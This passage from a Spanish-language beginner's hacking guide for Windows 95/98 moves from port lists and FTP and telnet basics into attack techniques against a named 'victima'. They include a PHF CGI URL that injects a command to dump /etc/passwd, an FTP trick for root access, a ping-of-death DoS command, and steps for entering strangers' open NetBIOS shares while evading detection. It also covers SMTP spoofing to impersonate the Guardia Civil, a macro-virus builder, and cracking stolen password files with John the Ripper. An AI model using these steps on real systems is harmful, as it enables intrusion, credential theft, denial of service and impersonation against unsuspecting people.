Kerberos authentication--udp kerberos_master 751/tcp # Kerberos authentication kerberos_master 751/udp # Kerberos authentication passwd_server 752/udp # Kerberos passwd server userreg_server 753/udp # Kerberos userreg server krb_prop 754/tcp # Kerberos slave propagation erlogin 888/tcp # Login and environment passing kpop 1109/tcp # Pop with Kerberos phone 1167/udp ingreslock 1524/tcp maze 1666/udp nfs 2049/udp # sun nfs knetd 2053/tcp # Kerberos de-multiplexor eklogin 2105/tcp # Kerberos encrypted rlogin rmt 5555/tcp rmtd mtb 5556/tcp mtbd # mtb backup man 9535/tcp # remote man server w 9536/tcp mantst 9537/tcp # remote man server, testing bnews 10000/tcp rscs0 10000/udp queue 10001/tcp rscs1 10001/udp poker 10002/tcp rscs2 10002/udp gateway 10003/tcp rscs3 10003/udp remp 10004/tcp rscs4 10004/udp rscs5 10005/udp rscs6 10006/udp rscs7 10007/udp rscs8 10008/udp rscs9 10009/udp rscsa 10010/udp rscsb 10011/udp qmaster 10012/tcp qmaster 10012/udp La verdad es que no te quejaras :) de esta lista. Si quieres mas informacion sobre los puertos con su debida explicacion mirate el RFC 1060. 3-2. Ftp. Supongo que a estas alturas sabras lo que es el FTP, File Transfer Protocol o sea Protocolo de Transferencia de Ficheros y como podras observar en el listado de los puertos al FTP le corresponde el 21. Este servicio hay que conocerlo muy bien ya que ademas que nos sirve para subir o bajar ficheros tambien nos puede ayuda en nuestros propositos :), por supuesto el hacking. Sino dispones de ningun cliente FTP, el propio win95/98 lleva incorporado uno, el unico problema es que no es muy vistoso ya que funciona en modo MS-DOS pero es muy versatil y perfecto para nosotros. Para ejecutarlo basta que activemos una ventana MS-DOS y en la linea de comados escribamos FTP y se pondra en modo FTP. Un ejemplo seria esto: c:\>ftp <- Escribimos FTP. ftp> <- activado el modo FTP. Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los comandos disponibles del FTP, como no viene a cuento no los explicare pero buscando por hay podras hallar informacion de lo que hace cada cosa pero lo mejor es que lo averigues tu solito. 3-3. Telnet. Por suerte los usuarios de win95/98 con el telnet tienen mas suerte o menos segun se mire, ya que el servico de Telnet de win95/98 que tambien esta incorporado en el sistema, es muy facil de manejar y ademas tiene ventana propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aqui la de "sistema remoto", entonces se activara otra ventana en la que nos saldra tres opciones, la primera "nombre de host" es donde queremos conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo tenemos "tipo de terminal" que no hace falta cambiarlo. El telnet es importante ya que es asi como entramos a una cuenta en un servidor y podremos hacer lo que tengamos permitido en el sistema. Logicamente entraremos en una cuenta si tenemos el login y password. 4. Hacking Basico En Windows. Por fin ya se a acabo el latazo de la explicacion de como moverse por win95/98. Ahora ya podemos empezar a jugar un poco por inet :), siempre por puro placer pero jamas con malos fines. En esta seccion os explicare varias maneras de hacking usando el win95/98 a pelo o sea sin utilizar ninguna herramienta externa. 4-1. Phf. La primera tecnica ya es muy conocida y la verdad es que tendremos suerte si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay que saber buscar y tener paciencia. Para que esto nos funcione solo tenemos que tener un navegador instalado en nuesto win95/98, por defecto suele venir el IE o sea que no podras decir que no tienes, siempre y cuando hallas instalado los paquetes extras. Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que corra sobre unix (muchos). Conectamos con un servidor en cuestion, www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le a¤adimos: http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Como ya he dicho si todo sale bien nos aparecera el fichero de passwords del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto el PHF tiene muchas variantes por eso te aconsejo que busce algo que profundice en esta tecnica al igual que tambien busca informacion sobre el fichero passwd de unix para comprenderlo. 4-2. Ftp. Antes ya te he explicado el funcionamiento del FTP de win95/98, ahora lo usaremos para sacer el fichero de password de un servidor. Desde una ventana del MS-DOS llamamos al programa FTP y escribimos: ftp> open victima.com Conect to victima.com 220 victim.com FTP server ready. ftp> quote user ftp 331 Guest login ok, send ident as password. ftp> quote cwd ~root 530 Please login with USER and PASS. ftp> quote pass ftp 230 Guest login ok, access restrictions apply. ftp> dir (o lo que querramos) Y como siempre es el caso si todo sale bien estaremos metidos en el sistema como root (en lenguaje unix significa el superusuario, o sea el que controla el servidor). Por desgracia esta tecnica es muy antigua por lo que mas seguro no funcionara pero todo es posible. 4-3. Ping De La Muerte. Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir Cracker para no ofender a nadie :) ya que unicamente sirve para tirar un servidor o sea que se desconecta de Internet y esto puede representar grandes perdidas a una empresa. Con esto solo os quiero decir que aunque aqui os lo explicare no es cuestion que lo useis por Internet atacando servidores. La utilidad Ping sirve principalmente para saber si un servidor esta activo y ademas podemos calcular el trafico en la red segun el tiempo de su respuesta. Basicamente se le envia un paquete a un servidor y este nos contesta, solo que si se le envia un paquete muy grande puede llegar desordenado, por lo que el servidor pide al origen que le vuelva a enviar una parte o la totalidad del paquete, por lo que se produce un datagrama del ping muy grande y producira su caida. Para ejecutar este ataque solo tenemos que escribir : c:\>ping -l 65510 victima.com Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes de hacer tonterias leed la parte sobre seguridad de la guia. 4-4. Recursos Compartidos. Como win95/98 NO tiene seguridad nos permite colarnos en el disco duro de otra persona por Internet y lo mejor del caso es que esta tecnica nos la proporciona los propios programas del win95/98. Por supuesto no todo es tan sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala configuracion del propio usuario al no configurar adecuadamente los recursos compartidos de su red corriendo sobre win95/98. Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador bien configurado, o sea el compartir recursos bien puesto y tambien tener el Netbios instalado. Para configurarlo, tenemos que tener activado la opcion de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red. SI por el caso la opcion esta desactivada simplemente pulsamos el boton de "a¤adir" y a¤adimos el servicio "Compartir ficheros e impresoras en redes Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion" en "Cliente para redes Microsoft". Tambien tiene que estar activado el "Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso Telefonico a Redes->Conexion a Inet que usaremos->boton derecho-> propiedades, debiendo estar activada la casilla "conectarse a la red". Ahora ya podemos ponernos manos a la obra, entonces volvemos a una ventana del MS-DOS y ejecutamos: c:\>nbtstat -A (IP DE LA VICTIMA) NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- VICTIMAMACHINE <00> UNIQUE Registered VICTIMAGROUP <00> GROUP Registered VICTIMAMACHINE <03> UNIQUE Registered VICTIMAMACHINE <20> UNIQUE Registered VICTIMAGROUP <1E> GROUP Registered MAC Address = 44-45-53-54-00-00 Cuando ejecutamos este comando nos saldra una tabla como esta y el primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes ver la maquina se llama VICTIMAMACHINE. Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP y el nombre de la maquina en cuestion, esto seria de la siguiente forma: c:\>edit c:\windows\system32\LMHOSTS VICTIMAMACHINE Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos un comando para a¤adir el ordenador de la victima a nuestro Netbios y esto seria de la siguiente forma: c:\>NBTSTAT -R Ahora nos interesa saber que recursos comparte la victima y esto tampoco nos traera complicacion alguna: c:\>net view \\VICTIMAMACHINE Shared resources at \\VICTIMAMACHINE Sharename Type Comment ----------------------------------------- BANCO Disk Y como podemos observar comparte una carpeta llamada BANCO. Ahora ya podemos operar como si fuese una terminal mas en nuestra red local sobre win95/98. Ya solo nos queda ejecutar el comando que querramos, si por ejemplo queremos ver el contenido, solo tenemos que escribir: c:\> dir \\VICTIMAMACHINE\BANCO O para leer cualquier fichero de la carpeta: c:\> type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT Si queremos conectar al recurso compartido de forma grafica (o sea con una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible si hemos a¤adido la VICTIMAMACHINE a una unidad de red a la que podamos llamar, deberemos ejecutar: c:\>NET USE e: \\MIPC\WINDOWS Esta tecnica solo funciona si la maquina remota ejecuta win95/98 o win 3.11 y ademas comparte las carpetas sin contrase¤a en modo "Acceso a nivel compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina para que este autorizada, esto lo conseguiremos con el Regedit, por desgracia los sistemas win95/98 y OSR2 que estan ejecutando el Servidor Web Personal de Microsoft desactivan esta posibilidad de acceso remoto tras informar de la conveniencia de hacerlo al usuario, ya que el servidor web obliga a compartir carpetas aun sin tener red local. Logicamente un usuario que haya tenido el despiste de conectarse a Internet con carpetas compartidas no toma luego medidas de control sobre quien entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser pillados si por ejemplo un usuario ejecuta el programa Netwatch, que muestra los usuarios conectados a nuestra computadora en cada momento y por supuesto el nombre de las computadoras por lo que es aconsejable cambiar el nombre de nuestra computadora usando el Regedit. Si nuestra maquina se llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con el Regedit a un nombre menos sospechoso. Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se dara cuenta de nuestra entrada. Tambien hay que decir que si la VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo "hay otros usuarios conectados a su ordenador, si apaga se desconectaran" si ocurre esto seremos pillados. Decir que el comando Net, dispone de muchos parametros que nos puede ser utiles y ademas podemos jugar durante mucho tiempo con ellos :) los cuales son los siguientes: c:\>net /? For more information about a specific Microsoft NET command, type the command name followed by /? (for example, NET VIEW /?). NET CONFIG Displays your current workgroup settings. NET DIAG Runs the Microsoft Network Diagnostics program to display diagnostic information about your network. NET HELP Provides information about commands and error messages. NET INIT Loads protocol and network-adapter drivers without binding them to Protocol Manager. NET LOGOFF Breaks the connection between your computer and the shared resources to which it is connected. NET LOGON Identifies you as a member of a workgroup. NET PASSWORD Changes your logon password. NET PRINT Displays information about print queues and controls print jobs. NET START Starts services. NET STOP Stops services. NET TIME Displays the time on or synchronizes your computer's clock with the clock on a Microsoft Windows for Workgroups, Windows NT, Windows 95, or NetWare time server. NET USE Connects to or disconnects from a shared resource or displays information about connections. NET VER Displays the type and version number of the workgroup redirector you are using. NET VIEW Displays a list of computers that share resources or a list of shared resources on a specific computer. The command was completed successfully. Pues aqui teneis todos los parametros disponibles del comando Net, por lo que solo nos queda jugar un rato para saber que es cada cosa. No es divertido si os lo explico todo. 4-5. Fake Mail Con El Telnet. Esta tecnica nos ayuda a suplantar la direccion de correo electronica que querramos :). La verdad es que tiene pocos usos, en mi opinion debido a una serie de razones pero siempre puede servir para gastar una buena broma enviando aun amigo un mail del director de la Universidad diciendo que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la Guardia Civil. La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar unas ciertas medidas de seguridad, que ya explicare luego. Lo primero que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de poner el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos a que nos conectemos a ese puerto, cuando conectemos nos saldra un mensaje y esta esperando a que pulsemoa alguna tecla: 220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP) [d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT) Muchas veces lo que podemos hacer es escribir "help" y saldran todos los comandos, tambien podemos escribir "echo" y la maquina nos contestara que esta lista. Para escribir un mail hay que seguir una serie de pasos: mail from:gc.uco@mad.servicom.es <- ponemos de donde viene. El servidor nos contesta: 250 ... Sender Okay Ahora escribimos: rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos. El servidor nos contesta: 250 ... Recipiant Okay Ahora escribimos: data El servidor nos contesta: 354 Enter mail, end with "." on a line by itself Ahora escribimos: To: nob_ody@xxxxxxxx.com From: gc.uco@mad.servicom.es Subject: Te querremos!! Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te querremos fichar para el departamento. Direccion General de la Guardia Civil . <- para terminar el mail. El servidor nos contesta: 250 Mail accepted Ahora escribimos: quit <- ya esta todo listo :) Pues ves como es realmente simple!! Pero antes de empezar a jugar con esta tecnica tenemos que asegurarnos que el servidor de mail no regrista nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet sobre servidores que permiten hacer esto. 4-6. Cambiando El Entorno. Esta tecnica no es que sea propia del hacking ya que solo sirve para cambiar la pantalla de inicio o la de finalizar windows. Los logos de windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros con extension SYS pero siguen siendo realmente BMP'S. El logo del principio de windows (ya sabes el de las nubes) lo podeis encontrar como: c:\>logo.sys Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro grafico y si lo volvemos a quitar, usara el de siempre. El logo del final (cuando cierra windows) esta en el directorio windows y lo podemos encontrar como: c:\windows>logos.sys Logicamente es obligatorio que los graficos que querramos sustituir tengan de tama¤o 320x400 y sean ficheros BMP'S. Conviene que les pongamos el atributo de ocultos, que esto se hace con el comando Attrib, por ejemplo: c:\windows>attrib +h logos.sys <- lo oculta. c:\windows>attrib -h logos.sys <- lo hace visible. 4-7. Finger. La utilidad Finger, muy usada en Unix, en realidad no esta disponible en Win95/98 pero como somos Hackers nosotros si que somos capaces desde Win95/98. Finger se utiliza para obtener informacion de un servidor. Puede parecer una tonteria pero es util, por ejemplo, podemos empezar a sacar los Login's de los usuarios y empezar a adivinar sus passwords, tambien podemos vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la ultima vez que estuvo, etc...) y asi muchas cosas. La verdad es que para usar el Finger usaremos cualquier navegador, IE o Netscape. Simplemete nos dirigimos a un url un poco especial, es un web que permite hacer Finger a cualquier host y nos deveulve los resultados. Esto se conoce como "Finger Gateway". El url del web es: http://www.hgp.med.umich.edu/cgi-bin/finger 4-8. Whois. La utilidad Whois, al igual que Finger es muy comun en Unix y no esta disponible en Win95/98 pero comos somos asi de listos saldremos del apuro. Tambien sirve para pedir informacion de un servidor pero no el igual que Finger, ya que se diferencian en el tipo de informacion, el finger se suele utilizar mucho para buscar direcciones de correo mientras que el Whois, para averiguar informacion sobre un servidor en concreto. Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un host muy especial: c:\>telnet whois.internic.net Por supuesto Internic, una empresa privada norte ameriacana que se encarga de controlar los dominios de Internet, y podemos usar su base de datos para pedir informacion sobre un servidor. Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_ del_servidor" y nos sacara la informacion. telnet InterNIC > whois aol.com Connecting to the rs Database . . . . . . Connected to the rs Database America Online (AOL-DOM) 12100 Sunrise Valley Drive Reston, Virginia 22091 USA Domain Name: AOL.COM Administrative Contact: O'Donnell, David B (DBO3) PMDAtropos@AOL.COM 703/453-4255 (FAX) 703/453-4102 Technical Contact, Zone Contact: America Online (AOL-NOC) trouble@aol.net 703-453-5862 Billing Contact: Barrett, Joe (JB4302) BarrettJG@AOL.COM 703-453-4160 (FAX) 703-453-4001 Record last updated on 13-Mar-97. Record created on 22-Jun-95. Domain servers in listed order: DNS-01.AOL.COM 152.163.199.42 DNS-02.AOL.COM 152.163.199.56 DNS-AOL.ANS.NET 198.83.210.28 Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto es lo que nos ha sacado Internic. Al final podemos ver los dominios asociados a AOL. Pues sencillo y muy util, el whois. 4-9. Tracert. Esta utilidad que si esta implementada en Win95/98, nos sirve para calcular el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos saber por cuantos servidores pasa. Muy util para sacar posibles servidores victimas si nos llaman la atencion. Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert, a secas y nos sacara el menu de opciones disponible. c:\>tracert Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name Options: -d Do not resolve addresses to hostnames. -h maximum_hops Maximum number of hops to search for target. -j host-list Loose source route along host-list. -w timeout Wait timeout milliseconds for each reply. Pues como veis, no tiene ningun misterio las opciones del Tracert, por lo que ya aprendereis su uso con la experiencia. Ahora escribimos una direccion IP cuando invocamos al Tracert, de la siguente forma: c:\>tracert 198.83.210.28 Tracing route to dns-aol.ans.net [198.83.210.28] over a maximum of 30 hops: 1 * * * Request timed out. 2 138 ms 145 ms 135 ms 204.134.78.201 3 212 ms 191 ms 181 ms glory-cyberport.nm.westnet.net [204.134.78.33] 4 166 ms 228 ms 189 ms enss365.nm.org [129.121.1.3] 5 148 ms 138 ms 177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45] 6 284 ms 296 ms 178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221] 7 298 ms 279 ms 277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9] 8 238 ms 234 ms 263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18] 9 301 ms 257 ms 250 ms dns-aol.ans.net [198.83.210.28] Trace complete. Aqui podeis por todos lo sitios que ha pasado el paquete que hemos enviado al IP 198.83.210.28. Y asi podemos con todos los servidores de Internet. 4-10. Winipcfg. Ejecutando este comando, nos saldra una ventana windows informandonos de los diferentes valores de nuestra red. Realmente util para verificar la configuracion. 4-11. Ipconfig. Este programa es similar al anterior descrito pero funciona en modo MS-DOS. Al igual nos sirve para verificar la configuracion de nuestra red. Por ejemplo, lo ejecutamos asi: C:\WINDOWS>ipconfig Windows 98 IP Configuration 0 Ethernet adapter : IP Address. . . . . . . . . : 0.0.0.0 Subnet Mask . . . . . . . . : 0.0.0.0 Default Gateway . . . . . . : Decir que en el ordenador donde estoy escribiendo este articulo, no lo tengo en estos momentos en red, por eso no lo tengo configurado. Para pedir las diferentes opciones, ejecutamos: C:\WINDOWS>ipconfig -h Windows 98 IP Configuration Command line options: /All - Display detailed information. /Batch [file] - Write to file or ./WINIPCFG.OUT /renew_all - Renew all adapters. /release_all - Release all adapters. /renew N - Renew adapter N. /release N - Release adapter N. No veo la necesidad de traducir esto debido a que es realmente facil, en caso de no entender nada, aprende ingles :) Pero la que mas nos puede interesar es la opcion /All. 4-12. Arp. Ejecutamos este comando para que nos muestre o para modificar nuestra IP en nuestra red, mantenida por un servidor Windows NT. Por ejemplo: C:\WINDOWS>arp Displays and modifies the IP-to-Physical address translation tables used by address resolution protocol (ARP). ARP -s inet_addr eth_addr [if_addr] ARP -d inet_addr [if_addr] ARP -a [inet_addr] [-N if_addr] -a Displays current ARP entries by interrogating the current protocol data. If inet_addr is specified, the IP and Physical addresses for only the specified computer are displayed. If more than one network interface uses ARP, entries for each ARP table are displayed. -g Same as -a. inet_addr Specifies an internet address. -N if_addr Displays the ARP entries for the network interface specified by if_addr. -d Deletes the host specified by inet_addr. -s Adds the host and associates the Internet address inet_addr with the Physical address eth_addr. The Physical address is given as 6 hexadecimal bytes separated by hyphens. The entry is permanent. eth_addr Specifies a physical address. if_addr If present, this specifies the Internet address of the interface whose address translation table should be modified. If not present, the first applicable interface will be used. Example: > arp -s 157.55.85.212 00-aa-00-62-c6-09 .... Adds a static entry. > arp -a .... Displays the arp table. Y como viene siendo habitual, os remito a aprender ingles y a jugar con las distintos parametros que tiene este comando. 4-13. Route. Este comando nos permitira manejar la tabla local TCP/IP. Al igual que los demas comandos dispone de varios parametros, los cuales son los siguientes: C:\WINDOWS>route Manipulates network routing tables. ROUTE [-f] [command [destination] [MASK netmask] [gateway] [METRIC metric]] -f Clears the routing tables of all gateway entries. If this is used in conjunction with one of the commands, the tables are cleared prior to running the command. command Must be one of four: PRINT Prints a route ADD Adds a route DELETE Deletes a route CHANGE Modifies an existing route destination Specifies the destination host. MASK Specifies that the next parameter is the 'netmask' value. netmask Specifies a subnet mask value to be associated with this route entry. If not specified, it defaults to 255.255.255.255. gateway Specifies gateway. METRIC Specifies that the next paramenter 'metric' is the cost for this destination All symbolic names used for destination are looked up in the network database file NETWORKS. The symbolic names for gateway are looked up in the host name database file HOSTS. If the command is PRINT or DELETE, wildcards may be used for the destination and gateway, or the gateway argument may be omitted. Diagnostic Notes: Invalid MASK generates an error, that is when (DEST & MASK) != DEST. Example> route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1 The route addition failed: 87 Examples: > route PRINT > route ADD 157.0.0.0 MASK 255.0.0.0 157.55.80.1 METRIC 3 ^destination ^mask ^gateway ^metric > route PRINT > route DELETE 157.0.0.0 > route PRINT Creo que queda bastante claro, incluso provee distintos ejemplos para familiarizarnos con este comando. 4-14. Netstat. Este comando nos puede ser muy util para saber que conexiones tenemos activas en el momento de ejecutar este comando, para conexiones TCP/IP, lo ejecutamos asi, solo que en mi caso no saldra ya que no estoy conectado en este momento: C:\WINDOWS>netstat Active Connections Proto Local Address Foreign Address State Como veis no sale nada, pero si lo ejecutais cuando esteis conectados, ya vereis :) Como siempre este comando dispone de varios parametros, que son los siguientes: C:\WINDOWS>netstat /? Displays protocol statistics and current TCP/IP network connections. NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] -a Displays all connections and listening ports. -e Displays Ethernet statistics. This may be combined with the -s option. -n Displays addresses and port numbers in numerical form. -p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP. -r Displays the routing table. -s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once. Ya solo nos queda jugar con los distintos parametros y aprender :) 5. Utilizacion De Tools. En esta seccion os explicare diferentes tools que podeis usar para hacking, por supuesto hay que buscarlas por Internet, no pondre el url para encontrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe, pero os dire como se llama el programa asi lo podras buscar ademas esto tambien te servira para que te espabiles y sepas buscar cosas por Internet. Logicamente esta guia es para win95/98 y los programas que explicare seran para win95/98 pero tambien me veo obligado a explicar varias tools que no son de win95/98 propiamente sino de MS-DOS pero que son necesarias y ademas corren en modo MS-DOS de win95/98. 5-1. Skamwerks lab version 1.1b Este programa es un util herramienta que nos ayuda a crear de forma rapida virus macro, o sea para el Word. Tiene que estar instalado el Word para que este programa nos funcione. Al ejecutar el programa nos aparecera una ventana con 2 botones los caules son las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users". El "virii Wizard" es la opcion, si no sabemos muy bien como crear un virus de macro ya que nos moveremos por varios menus y crearemos un virus de forma rapida y facilmente. La otra opcion, "Advanced Users" es para aquellos que sepan de Word Basic, el lenguaje de programacion del Word, ya que podemos meter codigo Word basic directamente y asi crear un virus a nuestro gusto. Como este no es un curso sobre virus, no me voy a enrollar sobre la utilizacion exacta del programa. En mi opinion es un buen programa, en ingles :) programado en C++. 5-2. WaReZ! Version 95.12.31 Este programa es un cliente FTP que muestra los directorios ocultos en un servidor, util si nos metemos en algun sitio sospechoso. Como ya es costumbre para que nos funcione tenemos que tener instalado el WINSOCK.DLL correctamente. Al igual que antes tampoco hay que explicar mucho sobre este programa ya que su Interface es igual que el cliente WS_FTP que suele ser muy familiar para todos, por lo que no encontraremos mucha dificultad en su manejo. 5-3. John the ripper v1.4. Esta magnifica tool no es propiamente de win95/98 pero seria un pecado no hablar de ella, cuando corre sobre win95/98 de maravilla (bueno, dentro de lo que cabe :). John, como se le conoce, sirve para crackear un fichero unix de password (el conocido etc/passwd, como ya digo aprended algo de unix). Cuando robemos un fichero passwd de un servidor, lo que tenemos que hacer es usar el John para sacar cuentas, pero no solo basta esto sino tambien necesitamos un buen diccionario y una combinacion de suerte y paciencia. Supongamos que ya tenemos todo (fichero passwd, John y un diccionario), entonces tenemos que abrir una ventana MS-DOS y llamar al John, si lo llamamos sin nigun parametro nos saldran un listado de opciones, esto seria asi: c:\>john Usage: john [flags] [passwd files] Flags:-pwfile:[,..] specify passwd file(s) -wordfile: -stdin wordlist mode, read words from or stdin -rules enable rules for wordlist mode -incremental[:] incremental mode [using john.ini entry ] -single single crack mode -external: external mode, using john.ini entry -restore[:] restore session [from ] -makechars: make a charset, will be overwritten -show show cracked passwords -test perform a benchmark -users:[,..] crack this (these) user(s) only -shells:[!][,..] crack users with this (these) shell(s) only -salts:[!] crack salts with at least accounts only -lamesalts assume plaintext passwords were used as salts -timeout: